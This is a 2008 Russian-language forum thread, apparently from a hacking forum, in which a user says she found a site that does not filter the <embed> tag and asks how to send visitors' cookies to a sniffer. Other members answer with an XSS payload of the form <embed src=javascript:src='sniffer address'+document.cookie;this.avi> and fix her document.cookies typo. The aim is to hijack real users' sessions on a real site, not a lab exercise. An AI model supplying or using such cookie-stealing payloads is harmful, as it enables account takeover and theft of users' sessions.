использование тега embed для угона cookies ? |

14.12.2008, 00:51
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами:
9180110
Репутация:
0
|
|
использование тега embed для угона cookies ?
Обнаружила, что на сайте на фильтруется тег <embed> и javascript в нем. ТО есть работает конструкция <embed src=javascript:alert('ok');this.avi>.. Подскажите, как прописать здесь скрипт, чтобы работала передача cookies на сниффер античата.
|
|
|

14.12.2008, 00:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
также, как и обычно
|
|
|

14.12.2008, 01:06
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Везде,где есть атрибут src,есть возможность эксплуатации XSS,не учитывая существования фильтров.
|
|
|

14.12.2008, 01:07
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
В XSS не особо,но по моему так:
<embed src=javascript:src='адрес снифера';this.avi>
|
|
|

14.12.2008, 01:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
+document.cookie 
|
|
|

14.12.2008, 01:19
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Бля,точно,пропустил 
спс за поправку!
|
|
|

14.12.2008, 01:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
|
|
|

15.12.2008, 18:06
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами:
9180110
Репутация:
0
|
|
А, поняла, там фигня какая-то хитрая по-моему, которая не дает забрать cookies..
alert(document.cookies) выдает вместо cookies undefined
Типа защита такая что-ли))))
|
|
|

15.12.2008, 19:31
|
|
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами:
10447337
Репутация:
807
|
|
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
|
|
|

16.12.2008, 15:15
|
|
Новичок
Регистрация: 01.12.2008
Сообщений: 7
С нами:
9180110
Репутация:
0
|
|
Сообщение от freddi
ickhz, он это выдает тк нету такого объекта, как document.cookies, есть document.cookie.
Точно.. сорри! Теперь выводит пустой алерт.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|